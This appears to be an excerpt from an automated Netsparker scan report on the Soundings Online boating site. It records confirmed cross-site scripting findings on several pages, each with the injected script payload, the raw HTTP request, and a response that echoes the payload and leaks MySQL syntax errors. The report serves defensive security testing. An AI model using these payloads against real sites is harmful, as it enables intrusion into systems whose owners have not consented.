Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002440)</script>

Request

GET /contact-us?'"--></style></script><script>netsparker(0x002440)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002440)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002440)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/contact-us" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Contact Soundings Publications LLC - Questions Comments Help</title> <link href="/contact-us?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/contact-us?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_contact_us"><!--
Type of page: category<br />Section: 12, s_uncategorized<br />Category: 76, c_uncategorized<br />Menu: 55, m_contact_us-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span&g..
- /news/home-waters/272582/272582

/news/home-waters/272582/272582 CONFIRMED

http://www.soundingsonline.com/news/home-waters/272582/272582?'%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002463)</script>

Request

GET /news/home-waters/272582/272582?'"--></style></script><script>netsparker(0x002463)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002463)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002463)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/home-waters/272582/272582" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
Pilots Point
Brewer
Katy Russell
dockmaster" /> <meta name="title" content="Walking the docks, she's in her element" /> <meta name="author" content="Shannon Becker" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Walking the docks, she's in her element</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home_waters c_uncategorized m_home_waters"><!--
Type of page: article<br />Section: 17, s_home_waters<br />Category: 100, c_uncategorized<br />Menu: 86, m_home_waters-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><..
- /site-map

/site-map CONFIRMED

http://www.soundingsonline.com/site-map?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x002485..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002485)</script>

Request

GET /site-map?'"--></style></script><script>netsparker(0x002485)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002485)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002485)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/site-map" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Site Map</title> <link href="/site-map?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/site-map?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" 